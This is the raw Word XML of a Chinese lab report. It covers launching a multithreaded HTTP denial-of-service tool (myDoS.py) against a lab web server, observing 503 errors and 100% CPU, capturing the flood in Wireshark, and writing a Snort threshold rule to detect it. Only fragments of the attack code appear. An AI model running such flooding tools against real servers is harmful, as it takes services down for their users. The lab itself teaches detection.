          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
          <w:color w:val="000000"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
        </w:rPr>
        <w:t>th</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
          <w:color w:val="666600"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
          <w:color w:val="000000"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
        </w:rPr>
        <w:t>start</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
          <w:color w:val="666600"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
        </w:rPr>
        <w:t>()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6BD742FC"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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C31B5F5"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conn_th2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threading</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
          <w:color w:val="666600"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
          <w:color w:val="660066"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
        </w:rPr>
        <w:t>Thread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proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
          <w:color w:val="000000"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
        </w:rPr>
        <w:t>conn_thread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5A1E4DF2"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 xml:space="preserve">send_th2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threading</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
          <w:color w:val="666600"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
          <w:color w:val="660066"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
        </w:rPr>
        <w:t>Thread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target</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
          <w:color w:val="666600"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
        </w:rPr>
        <w:t>=</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
          <w:color w:val="000000"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
        </w:rPr>
        <w:t>send_thread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p>
    <w:p w14:paraId="57A123DD"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lastRenderedPageBreak/>
        <w:t>conn_th2</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p>
    <w:p w14:paraId="5BE9C527" w14:textId="77777777" w:rsidR="00764D7B" w:rsidRDefault="00764D7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930775"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
          <w:color w:val="000000"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
        </w:rPr>
        <w:t>send_th2</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p>
    <w:p w14:paraId="105A3886"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步骤5：实施拒绝服务攻击</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="703726BF"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步骤要求：执行编写的拒绝服务攻击程序（将被攻击的网络应用服务器IP地址、并发线程数量作为程序的输入参数），通过调节并发线程数量，调节拒绝服务攻击请求数量。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0ED664D3" w14:textId="77777777" w:rsidR="00647CA7"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涉及知识：多线程数量对拒绝服务攻击请求数量强度的影响</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA262B">
        <w:rPr>
          <w:rFonts w:ascii="华文仿宋" w:eastAsia="华文仿宋" w:hAnsi="华文仿宋" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>       </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3FF16295" w14:textId="584A88A4" w:rsidR="00F202CD" w:rsidRDefault="00F202CD" w:rsidP="00647CA7">
      <w:pPr>
        <w:spacing w:beforeLines="50" w:before="156" w:afterLines="50" w:after="156"/>
        <w:rPr>
          <w:rFonts w:ascii="华文仿宋" w:eastAsia="华文仿宋" w:hAnsi="华文仿宋" w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="3E68EFDE" wp14:editId="510D97CC">
            <wp:extent cx="5274310" cy="3318510"/>
            <wp:effectExtent l="0" t="0" r="2540" b="0"/>
            <wp:docPr id="2096341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1587" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId29"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5274310" cy="3318510"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="406FF06A" w14:textId="3BE6AB33" w:rsidR="00F202CD" w:rsidRPr="00DA262B" w:rsidRDefault="00F202CD" w:rsidP="00647CA7">
      <w:pPr>
        <w:spacing w:beforeLines="50" w:before="156" w:afterLines="50" w:after="156"/>
        <w:rPr>
          <w:rFonts w:ascii="华文仿宋" w:eastAsia="华文仿宋" w:hAnsi="华文仿宋" w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="1B428B9C" wp14:editId="2EEA0FE1">
            <wp:extent cx="5274310" cy="3318510"/>
            <wp:effectExtent l="0" t="0" r="2540" b="0"/>
            <wp:docPr id="2086747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47955" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId30"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5274310" cy="3318510"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B996DF8"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lastRenderedPageBreak/>
        <w:t>步骤6：对比查看拒绝服务攻击效果</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="681C839B"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步骤要求：拒绝服务攻击发生时，在网络用户</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00DA262B">
        <w:rPr>
          <w:rFonts w:ascii="华文仿宋" w:eastAsia="华文仿宋" w:hAnsi="华文仿宋"/>
        </w:rPr>
        <w:t>端访问</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00DA262B">
        <w:rPr>
          <w:rFonts w:ascii="华文仿宋" w:eastAsia="华文仿宋" w:hAnsi="华文仿宋"/>
        </w:rPr>
        <w:t>网络应用，查看访问结果和资源占用情况，并与前述的无攻击时的情况进行对比。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="28F1BA36"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涉及知识：拒绝服务攻击对计算资源等的消耗威害</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C81687B" w14:textId="77777777" w:rsidR="00647CA7"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1）拒绝服务攻击发生时，在网络用户</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00DA262B">
        <w:rPr>
          <w:rFonts w:ascii="华文仿宋" w:eastAsia="华文仿宋" w:hAnsi="华文仿宋"/>
        </w:rPr>
        <w:t>端访问</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00DA262B">
        <w:rPr>
          <w:rFonts w:ascii="华文仿宋" w:eastAsia="华文仿宋" w:hAnsi="华文仿宋"/>
        </w:rPr>
        <w:t>网络应用（以Web网络服务为例，通过浏览器访问Web服务器，发现无法访问成功，返回错误码为503的Service Unavailable）。而在无拒绝攻击时，能够访问成功Web服务器。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B921FBB" w14:textId="572D42F2" w:rsidR="00647CA7" w:rsidRPr="00DA262B" w:rsidRDefault="00F202CD" w:rsidP="00647CA7">
      <w:pPr>
        <w:spacing w:beforeLines="50" w:before="156" w:afterLines="50" w:after="156"/>
        <w:rPr>
          <w:rFonts w:ascii="华文仿宋" w:eastAsia="华文仿宋" w:hAnsi="华文仿宋" w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="7E6E1401" wp14:editId="27088E2A">
            <wp:extent cx="5274310" cy="3320415"/>
            <wp:effectExtent l="0" t="0" r="2540" b="0"/>
            <wp:docPr id="1547895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5403" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId31"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5274310" cy="3320415"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="5FD83C19" w14:textId="77777777" w:rsidR="00647CA7"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2）在拒绝服务攻击发生时，在网络应用端（Web服务器）查看，发现CPU资源占用率非常高，相较于无攻击发生时，CPU占用率大幅升高。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="05866BF8" w14:textId="29AE39F6" w:rsidR="00647CA7" w:rsidRPr="00DA262B" w:rsidRDefault="001A7F0E" w:rsidP="00647CA7">
      <w:pPr>
        <w:spacing w:beforeLines="50" w:before="156" w:afterLines="50" w:after="156"/>
        <w:rPr>
          <w:rFonts w:ascii="华文仿宋" w:eastAsia="华文仿宋" w:hAnsi="华文仿宋" w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="1BF2695D" wp14:editId="7FEB0B41">
            <wp:extent cx="5274310" cy="3318510"/>
            <wp:effectExtent l="0" t="0" r="2540" b="0"/>
            <wp:docPr id="1197708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08169" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId32"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5274310" cy="3318510"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="10E8B741"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步骤7：捕获网络流量</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4ACAE7E5"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步骤要求：在入侵检测端使用网络流量捕获工具Wireshark等，通过与交换机镜像端口相连的网络接口，捕获包含拒绝服务攻击的网络流量。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="652F0745"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涉及知识：网络流量捕获技术、网络流量捕获工具Wireshark等的使用。</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA262B">
        <w:rPr>
          <w:rFonts w:ascii="华文仿宋" w:eastAsia="华文仿宋" w:hAnsi="华文仿宋" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>       </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5836BC0E"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步骤8：分析拒绝服务攻击流量</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="46D944B2"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步骤要求：在入侵检测</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00DA262B">
        <w:rPr>
          <w:rFonts w:ascii="华文仿宋" w:eastAsia="华文仿宋" w:hAnsi="华文仿宋"/>
        </w:rPr>
        <w:t>端结合</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00DA262B">
        <w:rPr>
          <w:rFonts w:ascii="华文仿宋" w:eastAsia="华文仿宋" w:hAnsi="华文仿宋"/>
        </w:rPr>
        <w:t>TCP/IP、网络应用协议等知识，使用网络流量分析工具Wireshark等观察、分析和总结拒绝服务攻击流量特征。发现在短时间内，网络应用（Web服务器）收到了大量的网络请求，无法正常提供服务（返回给网络用户的消息为异常信息503 Service unavailable）。分析发现网络流量中含有大量来自同一个源地址的网络请求，具有显著的拒绝服务攻击的高频特征。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="182D31D0"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涉及知识：网络TCP/IP报文格式解析、网络应用协议分析。</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA262B">
        <w:rPr>
          <w:rFonts w:ascii="华文仿宋" w:eastAsia="华文仿宋" w:hAnsi="华文仿宋" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>       </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="18DCC78A" w14:textId="2045915B" w:rsidR="00647CA7" w:rsidRPr="00DA262B" w:rsidRDefault="001A7F0E" w:rsidP="00647CA7">
      <w:pPr>
        <w:spacing w:beforeLines="50" w:before="156" w:afterLines="50" w:after="156"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="华文仿宋" w:eastAsia="华文仿宋" w:hAnsi="华文仿宋" w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="27E60376" wp14:editId="0495C77E">
            <wp:extent cx="5274310" cy="3318510"/>
            <wp:effectExtent l="0" t="0" r="2540" b="0"/>
            <wp:docPr id="465045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45985" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId33"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5274310" cy="3318510"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="68DFBDD7"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t>步骤9：配置拒绝服务攻击检测规则</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A82D099"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在入侵检测上，把短时间内来自同一个源地址的网络服务请求的高频特征作为拒绝服务攻击识别的显著特征。在入侵检测系统Snort的规则文件中，将单位时间内收到网络应用请求的数量阈值作为攻击检测特征和告警规则进行配置。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="37896236"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涉及知识：入侵检测工具Snort等的使用、攻击检测和告警规则配置。</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA262B">
        <w:rPr>
          <w:rFonts w:ascii="华文仿宋" w:eastAsia="华文仿宋" w:hAnsi="华文仿宋" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>      </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C898949" w14:textId="77777777" w:rsidR="00647CA7" w:rsidRPr="00DA262B" w:rsidRDefault="00647CA7" w:rsidP="00647CA7">
      <w:pPr>
        <w:spacing w:beforeLines="50" w:before="156" w:afterLines="50" w:after="156"/>
        <w:rPr>
          <w:rFonts w:ascii="华文仿宋" w:eastAsia="华文仿宋" w:hAnsi="华文仿宋" w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="59FE8474" wp14:editId="142C2F62">
            <wp:extent cx="5274310" cy="3320415"/>
            <wp:effectExtent l="0" t="0" r="2540" b="0"/>
            <wp:docPr id="1144266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56989" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId26"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5274310" cy="3320415"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="33647CED"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b/>
          <w:bCs/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>步骤10：检测拒绝服务攻击</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="31196DE9"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步骤要求：运行入侵检测工具Snort等，并查看告警日志，验证配置的包含拒绝服务攻击检测识别特征的告警规则是否生效和记录告警日志。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="379A4702"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涉及知识：入侵检测工具Snort等的使用。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="34A2D684"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1）在入侵检测的命令行终端上运行入侵检测工具Snort的命令。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="660C6808" w14:textId="35C18A4C" w:rsidR="00647CA7" w:rsidRPr="00DA262B" w:rsidRDefault="001A7F0E" w:rsidP="00647CA7">
      <w:pPr>
        <w:spacing w:beforeLines="50" w:before="156" w:afterLines="50" w:after="156"/>
        <w:rPr>
          <w:rFonts w:ascii="华文仿宋" w:eastAsia="华文仿宋" w:hAnsi="华文仿宋" w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="5CE35003" wp14:editId="44E0105D">
            <wp:extent cx="5274310" cy="3318510"/>
            <wp:effectExtent l="0" t="0" r="2540" b="0"/>
            <wp:docPr id="229299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9336" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId34"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5274310" cy="3318510"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="04FFF232" w14:textId="77777777" w:rsidR="00647CA7" w:rsidRPr="00DA262B" w:rsidRDefault="00647CA7" w:rsidP="00647CA7">
      <w:pPr>
        <w:spacing w:beforeLines="50" w:before="156" w:afterLines="50" w:after="156"/>
        <w:ind w:firstLine="420"/>
        <w:rPr>
          <w:rFonts w:ascii="华文仿宋" w:eastAsia="华文仿宋" w:hAnsi="华文仿宋" w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA262B">
        <w:rPr>
          <w:rFonts w:ascii="华文仿宋" w:eastAsia="华文仿宋" w:hAnsi="华文仿宋"/>
        </w:rPr>
        <w:t>2）在入侵检测工具Snort的日志文件中查找触发网络攻击告警信息的检测规则的编号是否与之前配置的检测规则的编号相同，验证网络攻击检测规则。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="69FB223B" w14:textId="77777777" w:rsidR="00647CA7" w:rsidRDefault="00647CA7" w:rsidP="00647CA7">
      <w:pPr>
        <w:spacing w:beforeLines="50" w:before="156" w:afterLines="50" w:after="156"/>
        <w:rPr>
          <w:rFonts w:ascii="华文仿宋" w:eastAsia="华文仿宋" w:hAnsi="华文仿宋" w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="7604C1F4" wp14:editId="2F919C89">
            <wp:extent cx="5274310" cy="3320415"/>
            <wp:effectExtent l="0" t="0" r="2540" b="0"/>
            <wp:docPr id="2126442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09969" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId28"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5274310" cy="3320415"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="369298DB" w14:textId="0D915F85" w:rsidR="007F27B9" w:rsidRPr="001D32B6" w:rsidRDefault="007F27B9" w:rsidP="007F27B9">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t>四</w:t>
      </w:r>
      <w:r w:rsidRPr="001D32B6">
        <w:rPr>
          <w:rFonts w:ascii="华文仿宋" w:eastAsia="华文仿宋" w:hAnsi="华文仿宋" w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>、</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="华文仿宋" w:eastAsia="华文仿宋" w:hAnsi="华文仿宋" w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>对比分析</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A58B4E7" w14:textId="31E41B11" w:rsidR="007F27B9" w:rsidRDefault="00F80A8B" w:rsidP="007F27B9">
      <w:pPr>
        <w:spacing w:beforeLines="50" w:before="156" w:afterLines="50" w:after="156"/>
        <w:ind w:firstLine="420"/>
        <w:rPr>
          <w:rFonts w:ascii="华文仿宋" w:eastAsia="华文仿宋" w:hAnsi="华文仿宋" w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="华文仿宋" w:eastAsia="华文仿宋" w:hAnsi="华文仿宋" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>myDoS.py的拒绝服务攻击效果比</w:t>
      </w:r>
      <w:r w:rsidRPr="00F80A8B">
        <w:rPr>
          <w:rFonts w:ascii="华文仿宋" w:eastAsia="华文仿宋" w:hAnsi="华文仿宋" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>CC_Dos_Web.py</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="华文仿宋" w:eastAsia="华文仿宋" w:hAnsi="华文仿宋" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>好，服务器CPU占有率高达100%。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="352C0D6A" w14:textId="3AD2AF9B" w:rsidR="00652EBA" w:rsidRPr="001D32B6" w:rsidRDefault="007F27B9" w:rsidP="00652EBA">
      <w:pPr>
        <w:spacing w:beforeLines="50" w:before="156" w:afterLines="50" w:after="156"/>
        <w:rPr>
          <w:rFonts w:ascii="华文仿宋" w:eastAsia="华文仿宋" w:hAnsi="华文仿宋" w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="华文仿宋" w:eastAsia="华文仿宋" w:hAnsi="华文仿宋" w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>五</w:t>
      </w:r>
      <w:r w:rsidR="00652EBA" w:rsidRPr="001D32B6">
        <w:rPr>
          <w:rFonts w:ascii="华文仿宋" w:eastAsia="华文仿宋" w:hAnsi="华文仿宋" w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>、</w:t>
      </w:r>
      <w:r w:rsidR="00652EBA">
        <w:rPr>
          <w:rFonts w:ascii="华文仿宋" w:eastAsia="华文仿宋" w:hAnsi="华文仿宋" w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>问题及解决</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="29AFC836" w14:textId="0D880122" w:rsidR="00652EBA" w:rsidRPr="00652EBA" w:rsidRDefault="00652EBA" w:rsidP="00652EBA">
      <w:pPr>
        <w:spacing w:beforeLines="50" w:before="156" w:afterLines="50" w:after="156"/>
        <w:rPr>
          <w:rFonts w:ascii="华文仿宋" w:eastAsia="华文仿宋" w:hAnsi="华文仿宋" w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00652EBA">
        <w:rPr>
          <w:rFonts w:ascii="华文仿宋" w:eastAsia="华文仿宋" w:hAnsi="华文仿宋" w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>（一）问题</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="11E3526A" w14:textId="1024EF49" w:rsidR="00652EBA" w:rsidRDefault="00652EBA" w:rsidP="00652EBA">
      <w:pPr>
        <w:spacing w:beforeLines="50" w:before="156" w:afterLines="50" w:after="156"/>
        <w:ind w:firstLine="420"/>
        <w:rPr>
          <w:rFonts w:ascii="华文仿宋" w:eastAsia="华文仿宋" w:hAnsi="华文仿宋" w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="华文仿宋" w:eastAsia="华文仿宋" w:hAnsi="华文仿宋" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>1、入侵检测系统死机</w:t>
      </w:r>
      <w:r w:rsidR="00D30667">
        <w:rPr>
          <w:rFonts w:ascii="华文仿宋" w:eastAsia="华文仿宋" w:hAnsi="华文仿宋" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="37E3913A" w14:textId="5D6518DE" w:rsidR="00652EBA" w:rsidRDefault="00652EBA" w:rsidP="00652EBA">
      <w:pPr>
        <w:spacing w:beforeLines="50" w:before="156" w:afterLines="50" w:after="156"/>
        <w:rPr>
          <w:rFonts w:ascii="华文仿宋" w:eastAsia="华文仿宋" w:hAnsi="华文仿宋" w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="0A77DF1C" wp14:editId="3163449D">
            <wp:extent cx="5274310" cy="3320415"/>
            <wp:effectExtent l="0" t="0" r="2540" b="0"/>
            <wp:docPr id="1101848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8207" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId35"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5274310" cy="3320415"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A6DF427" w14:textId="51A05D37" w:rsidR="00652EBA" w:rsidRDefault="00652EBA" w:rsidP="00652EBA">
      <w:pPr>
        <w:spacing w:beforeLines="50" w:before="156" w:afterLines="50" w:after="156"/>
        <w:ind w:firstLine="420"/>
        <w:rPr>
